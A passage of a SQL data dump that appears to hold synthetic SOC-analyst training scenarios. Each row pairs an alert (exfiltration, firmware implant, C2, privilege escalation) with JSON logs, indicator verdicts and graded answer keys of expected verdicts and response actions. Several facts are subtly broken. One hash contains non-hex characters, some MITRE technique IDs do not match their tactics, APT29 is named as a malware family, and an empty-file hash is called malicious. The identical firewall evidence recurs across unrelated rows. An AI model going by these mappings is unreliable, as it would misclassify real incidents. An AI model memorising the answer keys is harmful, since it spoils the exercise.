attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Known administrative account used in lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f1d0f1e2a2b3c4d5e6f7a8b9c0d1e2f3g4h5i6j\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash of a tool commonly used for lateral 
movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(323, 'Data Exfiltration Attempt', 'high', 'Firewall Logs', 'APT10 attempts to exfiltrate the gathered data using encrypted channels to evade detection by security mechanisms, completing their operation.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:32:16Z\",\"src_ip\":\"10.0.0.25\",\"dst_ip\":\"203.0.113.45\",\"dst_port\":443,\"protocol\":\"HTTPS\",\"action\":\"allow\",\"bytes_sent\":10485760,\"username\":\"internal_user\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filenames\":[\"confidential_data.zip\"],\"firewall_rule\":\"Allow_HTTPS_Traffic\",\"geo_location\":\"External - United States\",\"alerts\":[\"Large data transfer detected\",\"Suspicious outbound connection\"]}', '2026-01-02 20:23:41', '2026-03-09 02:59:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT10.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash seen in recent malware campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(324, 'Suspicious Network Traffic Detected', 'high', 'Firewall Logs', 'Unusual outbound traffic patterns detected from the enterprise firewall, possibly indicating unauthorized access attempts. The traffic originates from an internal IP and targets an external IP known for hosting malicious content. This activity suggests the initial access phase of an intrusion operation.', 'Initial Access', 'T1078: Valid Accounts', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-15T14:25:30Z\",\"firewall_id\":\"FW123456\",\"src_ip\":\"10.0.5.23\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"src_port\":44321,\"dst_port\":8080,\"action\":\"allowed\",\"username\":\"jdoe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"suspicious_payload.exe\",\"bytes_out\":10240,\"bytes_in\":2048}', '2026-01-02 20:29:44', '2026-03-09 03:01:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"External IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username of the suspected compromised account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash related to a suspicious file payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"suspicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File name indicative of malicious 
activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(325, 'Malicious Firmware Update Detected', 'critical', 'Firewall Management Console', 'A rogue firmware update was installed on the firewall, allowing the attacker to execute code at a low level. Immediate action is required to mitigate potential threats.', 'Execution', 'T1496', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event_type\":\"firmware_update\",\"source_ip\":\"185.143.223.91\",\"destination_ip\":\"192.168.1.1\",\"user\":\"admin\",\"firmware_version\":\"v5.3.2\",\"action\":\"update_executed\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"update_file\":\"firmware_update_v5.3.2.bin\",\"status\":\"completed\",\"message\":\"Firmware update executed successfully. No errors reported.\",\"suspicious_indicators\":{\"source_ip\":\"185.143.223.91\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}}', '2026-01-02 20:29:44', '2026-03-09 03:04:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.91\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous targeted attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal firewall device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash belongs to a known malicious firmware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"firmware_update_v5.3.2.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Repository\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"User 
Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(326, 'Persistence Mechanism Established', 'critical', 'Firmware Integrity Checks', 'The implant modifies the SPI flash memory, embedding itself to persist through reboots. This ensures the implant survives reboots and OS re-installations.', 'Persistence', 'T1105: Ingress Tool Transfer', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:22:08Z\",\"event_id\":\"FW-INT-CHK-2023\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\",\"detected_hash\":\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\",\"modified_firmware\":\"/dev/mtd0\",\"username\":\"admin\",\"alert_message\":\"Firmware integrity check failed. Unauthorized modification detected in SPI flash memory.\",\"severity\":\"Critical\",\"protocol\":\"SPI\",\"action_taken\":\"None\",\"firmware_version\":\"v1.4.3\"}', '2026-01-02 20:29:44', '2026-03-09 03:05:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known firmware backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/dev/mtd0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Critical firmware storage location.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Authentication Logs\",\"verdict\":\"clean\",\"details\":\"Standard administrative account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:08Z\\\",\\\"event_id\\\":\\\"FW-INT-CHK-2023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"detected_hash\\\":\\\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\\\",\\\"modified_firmware\\\":\\\"/dev/mtd0\\\",\\\"username\\\":\\\"admin\\\",\\\"alert_message\\\":\\\"Firmware integrity check failed. Unauthorized modification detected in SPI flash memory.\\\",\\\"severity\\\":\\\"Critical\\\",\\\"protocol\\\":\\\"SPI\\\",\\\"action_taken\\\":\\\"None\\\",\\\"firmware_version\\\":\\\"v1.4.3\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:08Z\\\",\\\"event_id\\\":\\\"FW-INT-CHK-2023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"detected_hash\\\":\\\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\\\",\\\"modified_firmware\\\":\\\"/dev/mtd0\\\",\\\"username\\\":\\\"admin\\\",\\\"alert_message\\\":\\\"Firmware integrity check failed. 
Unauthorized modification detected in SPI flash memory.\\\",\\\"severity\\\":\\\"Critical\\\",\\\"protocol\\\":\\\"SPI\\\",\\\"action_taken\\\":\\\"None\\\",\\\"firmware_version\\\":\\\"v1.4.3\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:08Z\\\",\\\"event_id\\\":\\\"FW-INT-CHK-2023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"detected_hash\\\":\\\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\\\",\\\"modified_firmware\\\":\\\"/dev/mtd0\\\",\\\"username\\\":\\\"admin\\\",\\\"alert_message\\\":\\\"Firmware integrity check failed. Unauthorized modification detected in SPI flash memory.\\\",\\\"severity\\\":\\\"Critical\\\",\\\"protocol\\\":\\\"SPI\\\",\\\"action_taken\\\":\\\"None\\\",\\\"firmware_version\\\":\\\"v1.4.3\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:08Z\\\",\\\"event_id\\\":\\\"FW-INT-CHK-2023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"detected_hash\\\":\\\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\\\",\\\"modified_firmware\\\":\\\"/dev/mtd0\\\",\\\"username\\\":\\\"admin\\\",\\\"alert_message\\\":\\\"Firmware integrity check failed. 
Unauthorized modification detected in SPI flash memory.\\\",\\\"severity\\\":\\\"Critical\\\",\\\"protocol\\\":\\\"SPI\\\",\\\"action_taken\\\":\\\"None\\\",\\\"firmware_version\\\":\\\"v1.4.3\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:08Z\\\",\\\"event_id\\\":\\\"FW-INT-CHK-2023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"detected_hash\\\":\\\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\\\",\\\"modified_firmware\\\":\\\"/dev/mtd0\\\",\\\"username\\\":\\\"admin\\\",\\\"alert_message\\\":\\\"Firmware integrity check failed. Unauthorized modification detected in SPI flash memory.\\\",\\\"severity\\\":\\\"Critical\\\",\\\"protocol\\\":\\\"SPI\\\",\\\"action_taken\\\":\\\"None\\\",\\\"firmware_version\\\":\\\"v1.4.3\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(327, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'The attacker uses the compromised firewall to probe internal network components, seeking further access.', 'Lateral Movement', 'T1021', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.1.1.5\",\"protocol\":\"TCP\",\"src_port\":443,\"dst_port\":3389,\"action\":\"allowed\",\"username\":\"compromised_user\",\"filename\":\"malicious_payload.exe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_id\":\"1001\",\"message\":\"Suspicious lateral movement detected from compromised firewall to internal systems.\"}', '2026-01-02 20:29:44', '2026-03-09 03:06:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with multiple attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a critical server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account showing unusual activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File identified as malware by multiple antivirus engines.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"SHA256 Lookup\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known 
ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(328, 'Command and Control Channel Established', 'high', 'Network Intrusion Detection System', 'Encrypted traffic is observed between the compromised firewall and an external server, indicating active C2 communication.', 'C2 Communication', 'T1071.001', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:23:07Z\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.45\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"TLS\",\"session_id\":\"3f4e1ab7c9d4\",\"encrypted_bytes\":1520,\"decrypted_bytes\":0,\"tls_version\":\"TLS 1.2\",\"cipher_suite\":\"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256\",\"host\":\"compromised-firewall.local\",\"username\":\"jdoe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert_id\":\"C2-2023-0005\",\"malware_family\":\"APT29\",\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\"},{\"type\":\"username\",\"value\":\"jdoe\"}]}', '2026-01-02 20:29:44', '2026-03-09 03:08:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT29 malware.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(329, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention System', 'Data packets containing sensitive information are detected being sent to an external IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:23:37Z\",\"event_id\":\"EXF-20231015-002\",\"internal_ip\":\"192.168.1.25\",\"external_ip\":\"203.0.113.45\",\"filename\":\"confidential_report.pdf\",\"user\":\"jdoe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"action\":\"blocked\",\"description\":\"Attempted data exfiltration detected and blocked by DLP system.\"}', '2026-01-02 20:29:44', '2026-03-09 03:09:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal inventory\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal inventory\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive information\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash linked to suspicious activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.923Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:37Z\\\",\\\"event_id\\\":\\\"EXF-20231015-002\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.923Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:37Z\\\",\\\"event_id\\\":\\\"EXF-20231015-002\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.923Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:37Z\\\",\\\"event_id\\\":\\\"EXF-20231015-002\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.923Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:37Z\\\",\\\"event_id\\\":\\\"EXF-20231015-002\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.923Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:37Z\\\",\\\"event_id\\\":\\\"EXF-20231015-002\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(330, 'Privilege Escalation Detected', 'high', 'Access Logs', 'Unauthorized attempts to escalate privileges within the network were detected, indicating that the attacker is attempting to gain elevated access.', 'Privilege Escalation', 'T1068', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"username\":\"john_doe\",\"attempted_privilege\":\"Administrator\",\"previous_privilege\":\"Standard User\",\"process\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"hash\":\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\",\"status\":\"Failed\",\"message\":\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\"}', '2026-01-02 20:29:44', '2026-03-09 03:10:56', 